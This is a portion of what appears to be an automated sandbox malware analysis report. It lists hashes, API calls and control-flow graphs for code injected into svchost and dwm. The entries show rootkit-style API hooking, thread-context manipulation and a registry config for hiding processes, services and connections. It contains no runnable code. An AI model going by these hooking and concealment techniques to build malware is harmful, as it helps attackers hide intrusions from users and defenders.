                                                  • Opcode Fuzzy Hash: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction Fuzzy Hash: B541B562B14A8087DB20DF25E84D3AA77A5F399B94F484021EE4E97798DF7CC449C741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction ID: a0f7c1ae9174e41879115590fc91a039e4c0f770dc9206dcdcfcb6220428460f
                                                  • Opcode Fuzzy Hash: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction Fuzzy Hash: BA112B32A14B8082EB618B15E84825AB7E8F789F94F5C4260EFCE17764DF3CC955CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `managed vector destructor iterator'$ure'
                                                  • API String ID: 592178966-1581490017
                                                  • Opcode ID: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction ID: 060a86ae5289ad53a02203b7fdf239cc559b18924b70a4834c06fedba715eff2
                                                  • Opcode Fuzzy Hash: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction Fuzzy Hash: CCE04F61B50B8891DF018F31E4882D833689B5AB54F4C9122DA5C07311EB3CD2EDC311
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `eh vector copy constructor iterator'$ure'
                                                  • API String ID: 592178966-2675205102
                                                  • Opcode ID: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction ID: 91ef8543eb9b3230d7c4fdfdcec920597b09238ae0475c27e8ff5eb16afa890b
                                                  • Opcode Fuzzy Hash: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction Fuzzy Hash: 83E04661B50B8891DB028F31E4882983368AB6AB58F8CA122CA5C07311EB3CD2E8C301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: std::bad_alloc::bad_alloc
                                                  • String ID: vector constructor iterator'$lue
                                                  • API String ID: 1875163511-1709709380
                                                  • Opcode ID: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction ID: ae8d07aa030cb80ad39a00b752372a8bc143c08183d9a8aa52a923235beb4f58
                                                  • Opcode Fuzzy Hash: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction Fuzzy Hash: 51D05E22B10AC492EE10EB14E88C389633CF785B08FA85412D24C43575DF3CCA8EC341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction ID: 1d0426b08531652e4950a86176b7b46606fe81feb189a4170b5b2eca2540ca0c
                                                  • Opcode Fuzzy Hash: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction Fuzzy Hash: B2116D25B11B8082EB04CB66E40D21977E5F78AFD5F5C4024DE4E63725DF3CD84A8340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction ID: f81f25365b37b2f3eb1efc26708c47941fe2d7d54ce4f6659b8aa6834498bc62
                                                  • Opcode Fuzzy Hash: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction Fuzzy Hash: 5FE03231B01A0087E7088BA2D80D34937E6EB8AF89F0C8024C90A07360DF7D849D8B81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction ID: 82c1a736585754407f21856671cd751ada6d069cc3d8b91e97187367dc820b28
                                                  • Opcode Fuzzy Hash: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction Fuzzy Hash: DAE0E571B51A4087E7089B62D80D25977A6FB8AF95F4C8034C90A07320EF3C849D8A11

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 263 2baae262964-2baae2629ae NtEnumerateValueKey 264 2baae2629b0-2baae2629b3 263->264 265 2baae262a0c-2baae262a2a 263->265 264->265 266 2baae2629b5-2baae2629b7 264->266 267 2baae2629ba-2baae2629bc 266->267 267->265 268 2baae2629be-2baae2629dd NtEnumerateValueKey 267->268 269 2baae2629ee 268->269 270 2baae2629df-2baae2629e2 268->270 273 2baae2629f2-2baae262a0a call 2baae263c40 269->273 271 2baae2629e8-2baae2629ec 270->271 272 2baae2629e4-2baae2629e6 270->272 271->273 272->273 273->265 273->267
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: EnumerateValue
                                                  • String ID:
                                                  • API String ID: 1749906896-0
                                                  • Opcode ID: 9a3d6abee053d119b5b0bb566e5bc8119ec09140ace283cc72c3a18935112346
                                                  • Instruction ID: 1c1ae393e36cd05beb51f33b0ae199279c2b838396a447bd4b561c535c41deb0
                                                  • Opcode Fuzzy Hash: 9a3d6abee053d119b5b0bb566e5bc8119ec09140ace283cc72c3a18935112346
                                                  • Instruction Fuzzy Hash: 95218E3370479086EB748F1AA86462EF7B4F7E8B94F604219DED643B50EB34C84AC751

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\x4config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-1036178600
                                                  • Opcode ID: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction ID: c1685c451567e82aceb3601321d3db370b60f32415e971a81289c96137b44504
                                                  • Opcode Fuzzy Hash: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction Fuzzy Hash: 6E712C76310A5086EF109F66E8A869D73B4FB9CB9DF101221DE8E47B68DF78C448C361

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction ID: a9e206f3fffeb47bda4e503e25737ba5fa97603ad18a61407b0fc16711d87673
                                                  • Opcode Fuzzy Hash: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction Fuzzy Hash: BC115766300B8083EF249B25E428269B3B0E789B95F240138DE8D03794EF3DC549C725

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 57 2baae265f20-2baae265f47 58 2baae265f5b-2baae265f66 GetCurrentThreadId 57->58 59 2baae265f49-2baae265f58 57->59 60 2baae265f68-2baae265f6d 58->60 61 2baae265f72-2baae265f79 58->61 59->58 62 2baae26639f-2baae2663b6 call 2baae267d30 60->62 63 2baae265f8b-2baae265f9f 61->63 64 2baae265f7b-2baae265f86 call 2baae265d50 61->64 65 2baae265fae-2baae265fb4 63->65 64->62 69 2baae265fba-2baae265fc3 65->69 70 2baae266085-2baae2660a6 65->70 73 2baae26600a-2baae26607d call 2baae264900 call 2baae2648a0 call 2baae264860 69->73 74 2baae265fc5-2baae266008 call 2baae275470 69->74 75 2baae26620f-2baae266220 call 2baae2678af 70->75 76 2baae2660ac-2baae2660cc GetThreadContext 70->76 86 2baae266080 73->86 74->86 89 2baae266225-2baae26622b 75->89 79 2baae26620a 76->79 80 2baae2660d2-2baae2660f3 76->80 79->75 80->79 88 2baae2660f9-2baae266102 80->88 86->65 92 2baae266104-2baae266115 88->92 93 2baae266182-2baae266193 88->93 94 2baae266231-2baae266288 VirtualProtect FlushInstructionCache 89->94 95 2baae2662ee-2baae2662fe 89->95 99 2baae26617d 92->99 100 2baae266117-2baae26612c 92->100 103 2baae266205 93->103 104 2baae266195-2baae2661b3 93->104 101 2baae26628a-2baae266294 94->101 102 2baae2662b9-2baae2662e9 call 2baae267c98 94->102 97 2baae266300-2baae266307 95->97 98 2baae26630e-2baae26631a call 2baae2651e0 95->98 97->98 106 2baae266309 call 2baae2647d0 97->106 118 2baae26631f-2baae266325 98->118 99->103 100->99 108 2baae26612e-2baae266178 call 2baae263d60 SetThreadContext 100->108 101->102 109 2baae266296-2baae2662b1 call 2baae264780 101->109 102->89 104->103 110 2baae2661b5-2baae266200 call 2baae263cf0 call 2baae2678cd 104->110 106->98 108->99 109->102 110->103 123 2baae266367-2baae266385 118->123 124 2baae266327-2baae266365 ResumeThread call 2baae267c98 118->124 126 2baae266399 123->126 127 2baae266387-2baae266396 123->127 124->118 126->62 127->126
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 297bf004cc49a32a55d2d53cdaaf0703d4c8fb681ce5f786adcf53c87da58671
                                                  • Instruction ID: 75e5c71df9cd9383f02ffb7c20177f35fb0c121ae48959ada73d7db4dfdeeca6
                                                  • Opcode Fuzzy Hash: 297bf004cc49a32a55d2d53cdaaf0703d4c8fb681ce5f786adcf53c87da58671
                                                  • Instruction Fuzzy Hash: 15D19736209B8882DF709B0AE4A835AB7B0F3DCB84F204616EACD477A5DF38C555CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 2baae2654c0-2baae2654ec 130 2baae2654ee-2baae2654f6 129->130 131 2baae2654fd-2baae265506 129->131 130->131 132 2baae265508-2baae265510 131->132 133 2baae265517-2baae265520 131->133 132->133 134 2baae265531-2baae26553a 133->134 135 2baae265522-2baae26552a 133->135 136 2baae26553c-2baae265541 134->136 137 2baae265546-2baae265551 GetCurrentThreadId 134->137 135->134 138 2baae265ac3-2baae265aca 136->138 139 2baae26555d-2baae265564 137->139 140 2baae265553-2baae265558 137->140 141 2baae265571-2baae26557a 139->141 142 2baae265566-2baae26556c 139->142 140->138 143 2baae26557c-2baae265581 141->143 144 2baae265586-2baae265592 141->144 142->138 143->138 145 2baae2655be-2baae265615 call 2baae265ad0 * 2 144->145 146 2baae265594-2baae2655b9 144->146 151 2baae26562a-2baae265633 145->151 152 2baae265617-2baae26561e 145->152 146->138 155 2baae265645-2baae26564e 151->155 156 2baae265635-2baae265642 151->156 153 2baae265620 152->153 154 2baae265626 152->154 157 2baae2656a0-2baae2656a6 153->157 154->151 158 2baae265696-2baae26569a 154->158 159 2baae265650-2baae265660 155->159 160 2baae265663-2baae265688 call 2baae267c5c 155->160 156->155 161 2baae2656a8-2baae2656c4 call 2baae264780 157->161 162 2baae2656d5-2baae2656db 157->162 158->157 159->160 170 2baae26568e 160->170 171 2baae26571d-2baae265732 call 2baae2640b0 160->171 161->162 172 2baae2656c6-2baae2656ce 161->172 165 2baae2656dd-2baae2656fc call 2baae267c98 162->165 166 2baae265705-2baae265718 162->166 165->166 166->138 170->158 176 2baae265741-2baae26574a 171->176 177 2baae265734-2baae26573c 171->177 172->162 178 2baae26575c-2baae2657aa call 2baae275b10 176->178 179 2baae26574c-2baae265759 176->179 177->158 182 2baae2657b2-2baae2657ba 178->182 179->178 183 2baae2657c0-2baae2658ab call 2baae267830 182->183 184 2baae2658c7-2baae2658cf 182->184 196 2baae2658af-2baae2658be call 2baae264450 183->196 197 2baae2658ad 183->197 185 2baae2658d1-2baae2658e4 call 2baae264980 184->185 186 2baae265913-2baae26591b 184->186 198 2baae2658e8-2baae265911 185->198 199 2baae2658e6 185->199 189 2baae26591d-2baae265925 186->189 190 2baae265927-2baae265936 186->190 189->190 193 2baae265944-2baae265951 189->193 194 2baae26593f 190->194 195 2baae265938 190->195 201 2baae265954-2baae2659a9 call 2baae275470 193->201 202 2baae265953 193->202 194->193 195->194 206 2baae2658c0 196->206 207 2baae2658c2 196->207 197->184 198->184 199->186 208 2baae2659ab-2baae2659b3 201->208 209 2baae2659b8-2baae265a51 call 2baae264900 call 2baae264860 VirtualProtect 201->209 202->201 206->184 207->182 214 2baae265a61-2baae265ac1 209->214 215 2baae265a53-2baae265a58 GetLastError 209->215 214->138 215->214
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 5878fa9b33d1b589616fe97be2d7adc436dbfd2c8f8c4691bdb02c754586ee5a
                                                  • Instruction ID: 62f4f2039890e8a012a29b05a19b221ed9d67f070cd40da0311ae621545dc9c9
                                                  • Opcode Fuzzy Hash: 5878fa9b33d1b589616fe97be2d7adc436dbfd2c8f8c4691bdb02c754586ee5a
                                                  • Instruction Fuzzy Hash: 5302C932219B8486EB60DB59F4A435AB7B0F3D8794F204515EACE87BA8DF7CC448CB11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000003.1772464514.000002BAAE230000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE230000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_3_2baae230000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction ID: 94a88172f0b60fd696cc64984390f348451fd8bcf44f2110390452ad9ed8ab76
                                                  • Opcode Fuzzy Hash: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction Fuzzy Hash: F0914873B0126687DF64CF29D828B6D73F1F748B95F6480219EA907B88DB34D806CB21

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: b983b11adf99ec76272078e56f86ff06b3614e17bcbd6bd355fa3c20ccc27ce4
                                                  • Instruction ID: 033745bf89b122fd0ab18f49c35a52fcf28d24a3ecd61d3ec8804f0b5c68214b
                                                  • Opcode Fuzzy Hash: b983b11adf99ec76272078e56f86ff06b3614e17bcbd6bd355fa3c20ccc27ce4
                                                  • Instruction Fuzzy Hash: AA314F22619AC481EE30DA15E06835EF3B0F7EC784F200625E6CD46B98DF7DC548CB21

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000002BAAE263605
                                                  • PathFindFileNameW.SHLWAPI ref: 000002BAAE263614
                                                    • Part of subcall function 000002BAAE263C40: StrCmpNIW.SHLWAPI(?,?,?,000002BAAE262513), ref: 000002BAAE263C58
                                                    • Part of subcall function 000002BAAE263B8C: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BAAE26362B), ref: 000002BAAE263B9A
                                                    • Part of subcall function 000002BAAE263B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAE26362B), ref: 000002BAAE263BC8
                                                    • Part of subcall function 000002BAAE263B8C: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAE26362B), ref: 000002BAAE263BEA
                                                    • Part of subcall function 000002BAAE263B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAE26362B), ref: 000002BAAE263C05
                                                    • Part of subcall function 000002BAAE263B8C: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAE26362B), ref: 000002BAAE263C26
                                                  • CreateThread.KERNELBASE ref: 000002BAAE26365B
                                                    • Part of subcall function 000002BAAE261D48: GetCurrentThread.KERNEL32 ref: 000002BAAE261D53
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction ID: 81241cc7d5d64e9deb4aa12d6e19894d800a97224047d421c4175e52168a33ee
                                                  • Opcode Fuzzy Hash: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction Fuzzy Hash: 8F114C70A1068082FF74AB20A83D769B3B0EBEC785FB0422994C6852D5EF78C04CC637

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: cf0dee0a212942c84721c4df29aeea0ff4f37f1ccaf2485cecd256d0961477c6
                                                  • Instruction ID: 6529e5f20509574cbfcdcca711232b4d99c59b905966dfdfc90b9c6e9641c4d1
                                                  • Opcode Fuzzy Hash: cf0dee0a212942c84721c4df29aeea0ff4f37f1ccaf2485cecd256d0961477c6
                                                  • Instruction Fuzzy Hash: 37F03026629B4481DA30EB45F46834AB7B1F3EC7D4F280611F9CD03B69CB38C684DB11

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000002BAAE261630: GetProcessHeap.KERNEL32 ref: 000002BAAE26163B
                                                    • Part of subcall function 000002BAAE261630: HeapAlloc.KERNEL32 ref: 000002BAAE26164A
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE2616BA
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE2616E7
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE261701
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE261721
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.KERNELBASE ref: 000002BAAE26173C
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE26175C
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE261777
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE261797
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE2617B2
